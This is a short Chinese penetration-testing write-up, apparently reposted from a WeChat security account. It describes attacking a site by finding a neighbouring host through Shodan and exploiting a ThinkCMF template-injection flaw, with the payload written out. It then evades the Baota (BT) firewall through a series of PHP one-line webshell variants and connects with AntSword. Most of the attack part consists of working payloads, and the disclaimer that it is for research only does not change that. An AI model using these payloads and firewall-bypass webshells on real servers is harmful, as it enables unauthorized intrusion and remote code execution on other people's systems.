|
目标站: www.xxx.com
主站测试了没有找到突破口(不过多讲述了)
通过shodan查找旁站和c段
shodan c段语法:net:"127.0.0.0/24"
找到了一个旁站 一个注册网站(在同一个c段里找到的)
发现后台(好家伙,thinkcmf)
尝试了一波弱口令,无果
百度查该cms有无漏洞
https://www.cnblogs.com/0daybug/p/11790619.html
影响范围还挺广的
payload
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>
直接给bt防火墙拦截了(phpinfo()都拦截,哎)
换一个echo 输出看能不能
白屏了,说明没有拦截
访问test.php成功执行
接下来就是绕过宝塔getshell了
尝试一下原始的小马
<?php @eval($_POST[a]);
被拦截了
<?php @eval();
也被拦截了
既然eval()
函数无法使用,我们尝试其他的可执行命令的函数?
更换assert()
函数
一句话木马·
<?php assert(@$_POST['a']);
也是被拦截了
尝试只留assert()
成功执行(应该是$_POST[]被过滤了)
$_GET[],$_COOKIE[] //都被过滤了
去掉[]进行尝试,可以过,没被拦截,单独的[]也没被拦截
尝试令_POST
<?php $b=$_POST;assert(@$b[a]);
白屏了,应该是过了,访问tets1.php ,那个警告不用管,没报错
执行下phpinfo()
使用蚁剑进行连接
返回数据为空
将编码器改为random,成功连接
over
推荐阅读
信息安全 | 键盘记录之信息窃取(登录框密码隐藏就真的万无一失吗)
python | 用python写了一个谈恋爱AA公式,我被分手了
原文始发于微信公众号(鹏组安全):记一次渗透测试(绕过某塔)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论